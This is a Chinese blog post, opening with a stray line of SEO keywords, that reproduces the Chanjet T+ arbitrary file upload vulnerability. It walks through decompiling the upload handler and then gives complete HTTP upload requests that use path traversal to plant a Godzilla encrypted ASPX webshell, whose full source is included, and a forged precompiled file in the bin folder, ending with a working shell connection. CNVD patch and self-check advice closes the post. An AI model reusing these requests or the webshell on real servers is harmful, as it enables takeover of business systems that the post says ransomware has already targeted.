北京专业企业营销网站建设,做外贸网站多久更新,舆情分析公司哪家的系统好,wordpress防止cc攻击一、漏洞描述
2022年8月29日和8月30日#xff0c;畅捷通公司紧急发布安全补丁修复了畅捷通T软件任意文件上传漏洞。未经身份认证的攻击者利用该漏洞#xff0c;通过绕过系统鉴权#xff0c;在特定配置环境下实现任意文件的上传#xff0c;从而执行任意代码#xff0c;获得…一、漏洞描述
2022年8月29日和8月30日畅捷通公司紧急发布安全补丁修复了畅捷通T软件任意文件上传漏洞。未经身份认证的攻击者利用该漏洞通过绕过系统鉴权在特定配置环境下实现任意文件的上传从而执行任意代码获得服务器控制权限。目前已有用户被不法分子利用该漏洞进行勒索病毒攻击的情况出现。
CNVD对该漏洞的综合评级为“高危”。
二、影响范围
漏洞影响的产品和版本 畅捷通T单机版17.0且使用IIS10.0以下版本。
三、环境搭建
https://dad.chanapp.chanjet.com/TplusYZHJ17.0.zip 下载并解压文件 进行环境检测 开始检测 检测通过 安装 选择标准版进行安装安装时请关闭杀毒软件 等待安装完成过程中需要配置MSSQL 数据库的。不设置即可 安装完成
四、漏洞审计
根据网上流传的payload找到文件
TPlusStd\WebSite\SM\SetupAccount\Upload.aspx发现该文件为编译的文件 畅捷通整套程序用了预编译直接到根目录的bin下找对应的compiled文件 TPlusStd\WebSite\bin\uploadapp.aspx.ae7ca9bd.compiled ?xml version1.0 encodingutf-8?
preserve resultType3 virtualPath/WebSite/App/UploadApp.aspx hash16f32931f filehashcea02207aaa6fee7 flags110000 assemblyApp_Web_uploadapp.aspx.ae7ca9bd typeASP.app_uploadapp_aspxfiledepsfiledep name/WebSite/App/UploadApp.aspx /filedep name/WebSite/App/UploadApp.aspx.cs //filedeps
/preserve搜索 App_Web_uploadapp.aspx.ae7ca9bd
// CommonPage_SetupAccount_Upload
// Token: 0x06000004 RID: 4 RVA: 0x000020AC File Offset: 0x000002AC
protected void Page_Load(object sender, EventArgs e)
{this.ReadResources();if (base.Request.Files.Count 1){string text images/index.gif;object obj this.ViewState[fileName];if (obj ! null){text obj.ToString();}if (this.File1.PostedFile.ContentLength 204800){base.Response.Write(string.Concat(new string[]{script languagejavascriptalert(,this.PhotoTooLarge,); parent.document.getElementById(myimg).src,text,;/script}));return;}if (this.File1.PostedFile.ContentType ! image/jpeg this.File1.PostedFile.ContentType ! image/bmp this.File1.PostedFile.ContentType ! image/gif this.File1.PostedFile.ContentType ! image/pjpeg){base.Response.Write(string.Concat(new string[]{script languagejavascriptalert(,this.PhotoTypeError,); parent.document.getElementById(myimg).src,text,;/script}));return;}string fileName this.File1.PostedFile.FileName;string text2 fileName.Substring(fileName.LastIndexOf(\\) 1);this.File1.PostedFile.SaveAs(base.Server.MapPath(.) \\images\\ text2);string text3 base.Server.MapPath(.) \\images\\ text2;this.ViewState[fileName] images/ text2;TPContext.Current.Session[ImageName] text3;}
}代码大概的意思为上传的文件不大于2M然后判断Content-Type 是否为其中一个类型。然后写入到images 目录中。文件名没有任何过滤。
构造一下上传代码
POST /tplus/SM/SetupAccount/Upload.aspx?preload1 HTTP/1.1
Host: 192.168.154.139
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9,en;q0.8
Cookie: ASP.NET_SessionIdgvigofzulthd2v1i2q5zndtf; Hm_lvt_fd4ca40261bc424e2d120b806d985a141662302093; Hm_lpvt_fd4ca40261bc424e2d120b806d985a141662302093
Connection: close
Content-Type: multipart/form-data; boundary----WebKitFormBoundarywwk2ReqGTj7lNYlt
Content-Length: 183------WebKitFormBoundarywwk2ReqGTj7lNYlt
Content-Disposition: form-data; nameFile1;filename222.aspx
Content-Type: image/jpeg1
------WebKitFormBoundarywwk2ReqGTj7lNYlt--查看images文件中是否有这个文件
发现能够成功上传
五、getshell
用哥斯拉生成一个木马
然后cmd执行
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe -v / -p C:\Tools C:\111 -fixednames-p 代表的是你木马的目录。 C:\111 表示生成在那个目录中。
执行完毕后查看C:\111\bin目录
把666.sapx上传到网站根目录
POST /tplus/SM/SetupAccount/Upload.aspx?preload1 HTTP/1.1
Host: 192.168.154.129
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9,en;q0.8
Cookie: ASP.NET_SessionIdgvigofzulthd2v1i2q5zndtf; Hm_lvt_fd4ca40261bc424e2d120b806d985a141662302093; Hm_lpvt_fd4ca40261bc424e2d120b806d985a141662302093
Connection: close
Content-Type: multipart/form-data; boundary----WebKitFormBoundarywwk2ReqGTj7lNYlt
Content-Length: 1327------WebKitFormBoundarywwk2ReqGTj7lNYlt
Content-Disposition: form-data; nameFile1;filename../../../666.aspx
Content-Type: image/jpeg% Page LanguageC#%%try{string key 3c6e0b8a9c15224a;byte[] data new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(Context.Request.BinaryRead(Context.Request.ContentLength), 0, Context.Request.ContentLength);if (Context.Session[payload] null){ Context.Session[payload] (System.Reflection.Assembly)typeof(System.Reflection.Assembly).GetMethod(Load, new System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data });}else{ object o ((System.Reflection.Assembly)Context.Session[payload]).CreateInstance(LY); System.IO.MemoryStream outStream new System.IO.MemoryStream();o.Equals(outStream);o.Equals(Context); o.Equals(data);o.ToString();byte[] r outStream.ToArray();outStream.Dispose();Context.Response.BinaryWrite(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length));}}catch(System.Exception){}
%
------WebKitFormBoundarywwk2ReqGTj7lNYlt--把这两个文件上传到畅捷通的网站根目录的bin文件夹下
POST /tplus/SM/SetupAccount/Upload.aspx?preload1 HTTP/1.1
Host: 192.168.154.129
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9,en;q0.8
Cookie: ASP.NET_SessionIdgvigofzulthd2v1i2q5zndtf; Hm_lvt_fd4ca40261bc424e2d120b806d985a141662302093; Hm_lpvt_fd4ca40261bc424e2d120b806d985a141662302093
Connection: close
Content-Type: multipart/form-data; boundary----WebKitFormBoundarywwk2ReqGTj7lNYlt
Content-Length: 502------WebKitFormBoundarywwk2ReqGTj7lNYlt
Content-Disposition: form-data; nameFile1;filename../../../bin/666.aspx.cdcab7d2.compiled
Content-Type: image/jpeg?xml version1.0 encodingutf-8?
preserve resultType3 virtualPath/666.aspx hash88eec7b1a filehashffffcef8fb51b1fb flags110000 assemblyApp_Web_666.aspx.cdcab7d2 typeASP._666_aspxfiledepsfiledep name/666.aspx //filedeps
/preserve
------WebKitFormBoundarywwk2ReqGTj7lNYlt--使用哥斯拉连接shell http://192.168.154.129/tplus/666.aspx?preload1
连接成功
六、修复建议
目前畅捷通公司已紧急发布漏洞补丁修复该漏洞CNVD建议受影响的单位和用户立即升级至最新版本 https://www.chanjetvip.com/product/goods 同时请受漏洞影响的单位和用户立即按照以下步骤开展自查和修复工作 1、用户自查步骤 查询本地是否存在website/bin/load.aspx.cdcab7d2.compiled、website/bin/App_Web_load.aspx.cdcab7d2.dll、tplus/Load.aspx文件如存在说明已经中毒须重装系统并安装产品打补丁。
2、未中毒用户请
更新最新产品补丁。安装杀毒软件并及时升级病毒库。升级IIS和Nginx低版本至IIS10.0和Windows 2016。本地安装客户需尽快确认备份文件是否完整以及做了异地备份。云上客户请及时开启镜像功能。未能及时更新补丁的用户可联系畅捷通技术支持采取删除文件等临时防范措施。
3、已中毒用户请
检查服务器是否有做定期快照或备份如有可通过快照或备份恢复数据。联系畅捷通技术支持确认是否具备从备份文件恢复数据的条件及操作方法。
参考链接https://www.o2oxy.cn/4104.html
